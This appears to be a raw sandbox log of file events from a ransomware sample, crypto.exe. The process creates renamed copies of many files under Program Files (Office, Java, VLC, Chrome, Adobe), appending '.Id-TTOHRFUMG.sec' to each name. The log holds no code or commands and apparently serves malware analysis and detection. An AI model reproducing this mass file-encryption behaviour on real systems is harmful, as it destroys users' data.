File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libblend_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21321_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_over.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143758.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\ORG97R.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mscss7wre_en.dub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\te.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Mask1.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15171_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ExecutiveReport.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00390_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\PersonalMonthlyBudget.xltx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\AUTHORS.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ms.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\calendar.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01923_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ACWIZRC.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OISAPP.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libsmb_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00199_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00638_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CSS7DATA0009.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\blank.jtp.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Lima.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0324694.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATH_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libgain_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Paper.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKREQL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00798_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18239_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\utilityfunctions.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_100_percent.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_underline.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libcdda_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02724_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Faculty.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00120_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02009_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02074_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR6B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\logsession.dll	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BIZFORM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\PUSH.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\el.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Waveform.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0222021.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\DADSHIRT.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02218_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR23F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\BUZZ.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OSPP.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.VN.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01744_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR26F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\MAIN.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\TableTextService\TableTextServiceDaYi.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08758_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18229_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Groove.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR2B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsBrowserUpgrade.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL110.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106816.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115844.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21348_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VS_ComponentSigningIntermediate.cer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00260_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18245_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OriginMergeLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152608.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304861.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR37F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\POSTCARD.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBHOME.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mscss7wre_fr.dub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\39.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\java-rmi.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\management\snmp.acl.template.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_SlateBlue.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\NewRename.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL108.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PRRT.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\wmpnscfg.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02390_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\zip.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02120_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Verve.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21328_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLCTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\XLSLICER.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Response.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14801_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mset7jp.kic.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21365_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240291.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\DOCL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw120.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\activity16v.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153047.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00633_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02276_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\spacer_highlights.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0292982.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15168_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_choosefont.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\libEGL.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\msmgdsrv.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)grayStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\core.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\VVIEWER.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOUC.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Bishkek.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\control\libdummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIconSubpictur.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\RES98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_iw.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\PST8PDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00246_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\WSS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSTORYVERT.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\el.txt.Id-TTOHRFUMG.sec	crypto.exe
